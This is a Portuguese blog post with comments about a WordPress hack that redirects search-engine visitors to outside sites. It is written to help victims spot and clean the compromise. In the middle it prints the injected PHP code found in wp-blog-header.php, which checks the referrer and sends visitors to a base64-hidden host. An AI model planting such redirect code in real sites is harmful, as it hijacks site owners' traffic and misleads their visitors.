Blogando com Alma... Ainda.

Suas Visitas do Google Sumiram? Seu Wordpress Pode Ter Sido Hackeado

Há alguns dias passei por uma situação estranha. Todas as visitas do Blosque, vindas do Google, desapareceram. No entanto, o blog continuava indexado. Nas mesmas posições que antes!

Contador de Visitas

Vários dias de pesquisa foram necessários, para que eu finalmente descobrisse o que estava acontecendo. Fui vítima de um…

Exploit que está atacando muitos blogs do Wordpress.

O que o exploit faz é redirecionar as visitas vindas do Google (e de outras fontes) para o site anyresults.net ou your-needs.info.

Isso é o que causa esse estranho efeito que eu notei: o blog continua indexado, nas mesmas posições, mas não recebe visitas do Google.

Como bem disse o Becher, a impressão que dá é que as pessoas tivessem deixado de usar o Google.

O exploit tem várias formas.

O famoso Donncha descreve várias delas no post Did Your WordPress Site Get Hacked?, junto com as soluções para cada caso.

No meu blog, o exploit foi feito através do arquivo wp-blog-header.php. Este código foi inserido no começo do arquivo:

<?php $seref=array("google","msn","live","altavista",
"ask","yahoo","aol","cnn","weather","alexa");
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){
$ser="1"; break; }

if($ser=="1" && sizeof($_COOKIE)==0){ header("Location:
https://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>

Essa é só uma possibilidade.

Os códigos de redirecionamento também podem aparecer em seus arquivos do theme, em arquivos php ou disfarçados como plugins – em alguns casos, é feito o upload de um código php, disfarçado como jpg, à sua pasta de uploads. O código então é inserido na lista de plugins ativos, e aí, babaus visitas.

Para uma lista extensiva (e soluções) dos hacks, visite o post Did Your WordPress Site Get Hacked?. Também há mais informação nos fóruns do Wordpress.

Falha de Segurança no Wordpress 2.5.1?

Ladrão - Cuidado!O pessoal do Wordpress insiste em que o Wordpress 2.5.1 não é afetado pelo exploit – eles dizem que se você usa 2.5.1 e foi afetado, já deveria estar com a intrusão no blog, antes de fazer o upgrade.

Eu tenho lá minhas dúvidas.

Muita gente diz que foi hackeado após o upgrade, e isso é bastante fácil de perceber: no dia em que seu blog é hackeado, suas visitas desaparecem. Duvido muito que o exploit seja uma bomba de tempo, ou que lhe dê um período de “graça” antes de entrar em ação.

Duas últimas coisas, que descobri pesquisando sobre o assunto:

1 – O hack pode criar um user fantasma no seu blog, o que vai lhe permitir voltar a roubar suas visitas, caso você limpe a merda que foi feita.

Eu encontrei um user “Wordpress” na tabela wp-users, que não foi criado por mim e não era visível no painel de controle do Wordpress. Se você foi hackeado, ou desconfia ter sido, não esqueça de dar uma boa olhada nessa tabela, procurando por algum usuário estranho.

2 – Havia um arquivo chamado wp-info.txt na raiz do blog, onde estavam listadas todos os users e passwords do Wordpress e das bases de dados. É claro que esse arquivo deve ser deletado, como parte da limpeza do hack.

Mais informação:

Nospheratt, pensando na vida

Nospheratt

Quando eu cheguei (2006 - primeira era jurássica da Efigênia), isso aqui tudo ainda era mato.

Previous

Da Importância da Hospedagem do seu Blog

Next

Seu Blog Precisa de um Novo Rumo?

6 Comments

  1. Tive um problema parecido, quando estava usando o 2.33, mas desde que migrei para o 2.51 não tive mais problemas.

    No meu caso, o hack adicionou um iframe de 1×1 no meu tema, direcionando para um site na China.

  2. Aconteceu com o Hitech e só saímos do enrosco graças à ajuda de amigos, dentre eles, Tonobohn, Marquinh05, Becher e o bom Rafael, nosso Arcanjo.

    🙁

  3. Nossa, que coisa!!! Estou impressionada

  4. Por sorte escapei dessa, mas estou sempre de olho e agora atualizo na hora. Não dá mais para ficar rateando.

  5. Allan: Pois é, eu ainda estou na dúvida quanto à versão que é vulnerável. Tomara que eles tenham razão, e seja só o 2.3 – tomara.

    Wagner: Uma bela m*rda, isso. Pelo menos agora parece que os sites saíram do ar – até faz pouco, continuavam funcionando.

    Pior ainda, é que MUITa gente deve estar direcionado tráfego pra lá e nem sabe.

    Bom, o que seria de nós sem os amigos, né? 🙂

    Maysa: Eu proponho castração com serrote enferrujado, para os responsáveis.

    Noronha: Rateando. Rateando! Quanto faz que eu não “ouvia” isso. Inda se usa, ou tu (que nem eu) tá ficando velho, mesmo? 😛

  6. Meu site Wordpress joseguimaraes.com sumiu de vez. Será o mesmo problema?

Leave a Reply to Allan Brito Cancel reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Powered by WordPress & Theme by Anders Norén|Social Icons by Freepik